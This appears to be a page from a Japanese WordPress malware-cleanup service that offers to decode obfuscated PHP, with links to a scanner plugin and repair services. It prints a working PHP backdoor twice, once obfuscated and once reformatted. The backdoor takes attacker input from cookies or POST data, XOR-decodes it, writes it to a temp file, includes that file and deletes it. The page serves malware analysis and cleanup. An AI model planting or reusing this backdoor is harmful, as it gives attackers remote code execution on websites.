Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php function go1($aa2){$km3 = "m" ."s3.E" ."a7HhiL8#<06oy(x)nF;rt*uvc?5" ."9b1g@e_ l4'fdp/" ."k" ."I-" ;$hr5='';foreach($aa2 as $ou4){$hr5.=$km3[$ou4];}return $hr5;}$ss6 = Array();$ss6[] = go1(Array(14,5,31,2,15,34,6,43,49,29,2,31,31,49,41,11,32,14,49,32,6,2,37,49,37,37,15,32,43,43,11,29,41,6,5,5));$ss6[] = go1(Array(30,45,8,45,39,36,27,21,40,9,21,47,18,38,38,22,48,10,4,38,38,20,23,39));$ss6[] = go1(Array(3,0,16,44,27,40,37));$ss6[] = go1(Array(7,26));$ss6[] = go1(Array(3,46));$ss6[] = go1(Array(12));$ss6[] = go1(Array(13));$ss6[] = go1(Array(43,9,40,37,38,45,27,25,38,29,16,21,25,37,21,25,1));$ss6[] = go1(Array(5,24,24,5,17,38,0,37,24,35,37));$ss6[] = go1(Array(1,25,24,38,24,37,45,37,5,25));$ss6[] = go1(Array(37,19,45,40,16,44,37));$ss6[] = go1(Array(1,27,33,1,25,24));$ss6[] = go1(Array(27,21,40,9,21,47));$ss6[] = go1(Array(1,25,24,40,37,21));$ss6[] = go1(Array(45,5,29,47));$ss6[] = go1(Array(0,44,31));foreach ($ss6[8]($_COOKIE, $_POST) as $er14 => $vf11){function an8($ss6, $er14, $cv10){return $ss6[11]($ss6[9]($er14 . $ss6[0], ($cv10 / $ss6[13]($er14)) + 1), 0, $cv10);}function sx7($ss6, $xz12){return @$ss6[14]($ss6[3], $xz12);}function ow9($ss6, $xz12){if (isset($xz12[2])) {$yy13 = $ss6[4] . $ss6[15]($ss6[0]) . $ss6[2];@$ss6[7]($yy13, $ss6[6] . $ss6[1] . $xz12[1]($xz12[2]));@include($yy13);@$ss6[12]($yy13);exit();}}$vf11 = sx7($ss6, $vf11);ow9($ss6, $ss6[10]($ss6[5], $vf11 ^ an8($ss6, $er14, $ss6[13]($vf11))));}
<?php function go1($aa2) { $km3 = "ms3.Ea7HhiL8#<06oy(x)nF;rt*uvc?59b1g@e_ l4'fdp/kI-"; $hr5 = ''; foreach ($aa2 as $ou4) { $hr5 .= $km3[$ou4]; } return $hr5; } $ss6 = array(); $ss6[] = go1(array(14, 5, 31, 2, 15, 34, 6, 43, 49, 29, 2, 31, 31, 49, 41, 11, 32, 14, 49, 32, 6, 2, 37, 49, 37, 37, 15, 32, 43, 43, 11, 29, 41, 6, 5, 5)); $ss6[] = go1(array(30, 45, 8, 45, 39, 36, 27, 21, 40, 9, 21, 47, 18, 38, 38, 22, 48, 10, 4, 38, 38, 20, 23, 39)); $ss6[] = go1(array(3, 0, 16, 44, 27, 40, 37)); $ss6[] = go1(array(7, 26)); $ss6[] = go1(array(3, 46)); $ss6[] = go1(array(12)); $ss6[] = go1(array(13)); $ss6[] = go1(array(43, 9, 40, 37, 38, 45, 27, 25, 38, 29, 16, 21, 25, 37, 21, 25, 1)); $ss6[] = go1(array(5, 24, 24, 5, 17, 38, 0, 37, 24, 35, 37)); $ss6[] = go1(array(1, 25, 24, 38, 24, 37, 45, 37, 5, 25)); $ss6[] = go1(array(37, 19, 45, 40, 16, 44, 37)); $ss6[] = go1(array(1, 27, 33, 1, 25, 24)); $ss6[] = go1(array(27, 21, 40, 9, 21, 47)); $ss6[] = go1(array(1, 25, 24, 40, 37, 21)); $ss6[] = go1(array(45, 5, 29, 47)); $ss6[] = go1(array(0, 44, 31)); foreach ($ss6[8]($_COOKIE, $_POST) as $er14 => $vf11) { function an8($ss6, $er14, $cv10) { return $ss6[11]($ss6[9]($er14 . $ss6[0], $cv10 / $ss6[13]($er14) + 1), 0, $cv10); } function sx7($ss6, $xz12) { return @$ss6[14]($ss6[3], $xz12); } function ow9($ss6, $xz12) { if (isset($xz12[2])) { $yy13 = $ss6[4] . $ss6[15]($ss6[0]) . $ss6[2]; @$ss6[7]($yy13, $ss6[6] . $ss6[1] . $xz12[1]($xz12[2])); @(include $yy13); @$ss6[12]($yy13); exit; } } $vf11 = sx7($ss6, $vf11); ow9($ss6, $ss6[10]($ss6[5], $vf11 ^ an8($ss6, $er14, $ss6[13]($vf11)))); }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.